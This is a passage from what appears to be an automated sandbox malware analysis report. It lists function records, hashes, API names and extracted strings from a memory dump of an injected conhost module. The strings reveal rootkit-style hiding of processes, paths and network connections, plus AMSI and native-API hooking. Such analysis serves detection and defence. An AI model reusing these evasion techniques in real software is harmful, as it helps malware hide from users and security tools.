                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 041698779511a647415a8b1b96deda8212bcb4ccb3cadc807996dfa00b11d972
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: B0316F72214B809AEB609F70F8603ED7764F789748F44402ADA8E47BA5EF38CA5DC711
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: 7da2fdef6d95e8e511b4c27c9a2df848831a65ade73be63cf468da36c4b58037
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: 14316132224B8095DB609F35F8503DE77A4F78A758F501225EA9D43BA5EF38C56ACB01

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: b39c5a254e16ff0d48ef13427563e886b9409c68beba5dd03a6ad50f611a657f
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 25711E36720A10A6EB10DF75F8A46D92764F786B8CF002111DE8E57B79EF38C96AC741

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00000146F6B01D4B
                                                            • Part of subcall function 00000146F6B020C4: GetModuleHandleA.KERNEL32(?,?,?,00000146F6B01D7D), ref: 00000146F6B020DC
                                                            • Part of subcall function 00000146F6B020C4: GetProcAddress.KERNEL32(?,?,?,00000146F6B01D7D), ref: 00000146F6B020ED
                                                            • Part of subcall function 00000146F6B05F60: GetCurrentThreadId.KERNEL32 ref: 00000146F6B05F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: cce7ec61143fbbd942882ab3f135094c313388dc1512fcb324c1f9a6883e03eb
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction Fuzzy Hash: 684190B4134A1AB0EA09EB74FB716D42B60B70278CF902513959D432B5AE78CE6FC353

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 03ea934e9de3104860205942670df6cbdc1e68b4b794af166bdef8ffce4747f5
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: 30514E32210B8496EB54CF72F55839AB7A1F78AB9DF045124DE8907728EF3CC46ACB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: ba710e4dbac96daf37ede1953dd8af9b54bb538ea984b992f904f05ca8003818
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: A781B131A0064186FA549B76B8713D962A2AB9B78CF146015ADCC437B6DF39CC7F9703

                                                          Control-flow Graph

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D267
                                                          • FlsGetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D27C
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D29D
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D2EC
                                                          • SetLastError.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000146F6B0F0FC,?,?,?,?,00000146F6B0C3CF,?,?,?,?,?,00000146F6B07EE0), ref: 00000146F6B0D35C
                                                            • Part of subcall function 00000146F6B0DAFC: HeapAlloc.KERNEL32(?,?,00000000,00000146F6B0D432,?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0DB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D384
                                                            • Part of subcall function 00000146F6B0DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000146F6B0643A), ref: 00000146F6B0DB8A
                                                            • Part of subcall function 00000146F6B0DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000146F6B0643A), ref: 00000146F6B0DB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D3A6
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: 683bc0372eab17cde8d1f4e855a5ada70ecbce6b2aedc972daacec78ecfb5b25
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: A241843032528462F968A33177753E92A519B4B7BCF147724ADBE466F6DE248C3B4203

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: d1dd2e42791b8172372fe0b9377aa6de00e96a97b64d439719e9479396d9999c
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: 5231C532624A41A6F720CF32B9183D9A7A0F78AB99F4411259ECD43634EF38C86B8741

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: 5d585a5be9bd6591385c2d8f199e697f28966a6c7565dba158640fd11488ed6b
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: D231B131620B52A6F750CF36B96879967A1B78AF89F0451259ECE43734EF38C86B8701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: b7b21a3e1c8c9095850f66e4770d4b6db26ab3a11c71386284aafb31d2ab64c0
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: B0E18B32600B408AEB209F75E4603DD37A2F756B9CF000515EF8D57BAADB34D9AAC702

                                                          Control-flow Graph

                                                          • Control-flow graph 321 (rendered as an image in the report; the raw edge list and the executed / not-executed colouring of the image do not survive as text and are not reproduced here).
                                                          • Entry block 146f6b0a974; basic blocks span 146f6b0a974 to 146f6b0ae4b. No Win32 API calls are annotated on the graph.
                                                          • Subroutines called from the graph: 146f6b0b844, 146f6b0cb78, 146f6b09a64, 146f6b0ae4c, 146f6b07d70, 146f6b0a154, 146f6b09e40, 146f6b0a114, 146f6b09ce4, 146f6b0cad8, 146f6b0a128, 146f6b0b068, 146f6b0b8dc, 146f6b09d74, 146f6b09f80, 146f6b0a8a0, 146f6b0b9cc, 146f6b096dc, 146f6b0b424, 146f6b098d0.
                                                          • Triage note: the three "csm" strings in the record that follows are the little-endian bytes of the MSVC C++ exception code 0xE06D7363, and together with the FrameHandler3 / Is_bad_exception_allowed / std::bad_alloc references they mark this function as the vcruntime C++ exception frame handler, i.e. CRT code rather than sample-specific logic.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: aa89d55c4accde8dcb13383cf65ae189225e251a83136f86e660f75fcebd07b9
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: 97E18F336247409AEB209F35E6503DD3BA4F74678CF106515EE8D57BA6CB34C9AAC702

                                                          Control-flow Graph

                                                          • Control-flow graph 442 (rendered as an image in the report; the raw edge list and the executed / not-executed colouring are not reproduced here).
                                                          • Entry block 146f6b0f7c4; basic blocks span 146f6b0f7c4 to 146f6b0f97e.
                                                          • Win32 API calls on the graph: LoadLibraryExW (blocks 146f6b0f851 and 146f6b0f8b0), GetLastError (146f6b0f876), FreeLibrary (146f6b0f93d), GetProcAddress (146f6b0f946). The helper 146f6b0cd58 is called twice between the GetLastError check and the second LoadLibraryExW.
                                                          • Triage note: a LoadLibraryExW attempt, a GetLastError check, two calls to the same helper, a retry LoadLibraryExW and then GetProcAddress, paired with the "api-ms-" / "ext-ms-" strings in the record that follows, is the shape of the MSVC CRT's delay-resolved Win32 import helper (which declines to retry the load for API-set names). Treat this as CRT boilerplate rather than the sample's own import resolver.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: d0bc01c74f2d989dfef83e7198bd61e7a7bc153f5fbff263e1150fdea8a5f6f1
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: 0C41F531335600A1EA16CB36B9247D52795FB07BE8F0461259D8D877A5EF38CC6F9302

                                                          Control-flow Graph

                                                          • Control-flow graph 468 (rendered as an image in the report; the raw edge list and the executed / not-executed colouring are not reproduced here).
                                                          • Entry block 146f6b0104c; basic blocks span 146f6b0104c to 146f6b011d0.
                                                          • Win32 API calls on the graph: RegQueryInfoKeyW in the entry block, RegEnumValueW in block 146f6b010cf (the loop head; block 146f6b011a5 branches back to it), and GetProcessHeap / HeapAlloc / GetProcessHeap / HeapFree in block 146f6b0114e. The shape is a registry value enumeration loop with a temporary heap buffer allocated and freed on one path of the loop body.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: bb40d6e8abd852c02028c367b13bf66891fa8df69d9935733b62ef76eea8e135
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 37417033224B80D6E764CF71F45439EB7A1F38AB98F449129DA8907768DF38C95ACB01

                                                          Control-flow Graph

                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D50F
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: 996b77c17395a368196e081deda9aed75172daacf5eb11d28d564de47ab90674
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 8511843032528061F954973577713E92A55AB463FCF546324ADBD476F6DE28CC3B4603

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: c739c30fb000fc6dd566936c7c7f766d6cb00d8a7846c1e69a9a2f7feea44fdc
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: 1E114C36624B4092E710CB21F55839A6761F38ABE9F504315EA9E02AA8DF7CC95ACB01

                                                          Control-flow Graph

                                                          • Control-flow graph 511 (rendered as an image in the report; the raw edge list and the executed / not-executed colouring are not reproduced here).
                                                          • Entry block 146f6b07940; basic blocks span 146f6b07940 to 146f6b07c5c. CRT symbols annotated on the graph: __scrt_dllmain_crt_thread_attach (block 146f6b07968) and __scrt_dllmain_after_initialize_c (block 146f6b07a0e). The function calls itself from blocks 146f6b07b93 and 146f6b07c05, and block 146f6b07bca calls 146f6b07aa8, which is a block of this same function.
                                                          • Other subroutines called from the graph: 146f6b07ff0, 146f6b07e84, 146f6b07f34, 146f6b07fac, 146f6b07e4c, 146f6b08348, 146f6b08160, 146f6b08184, 146f6b07fdc, 146f6b081c0, 146f6b07ef4, 146f6b0830c, 146f6b07e3c, 146f6b07e68, 146f6b0bc3c, 146f6b03620, 146f6b081b0, 146f6b080c8, 146f6b0bbf8.
                                                          • Triage note: the __scrt_* names in the record that follows belong to the MSVC CRT's DllMain / startup dispatch code, i.e. CRT boilerplate rather than sample-specific logic.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
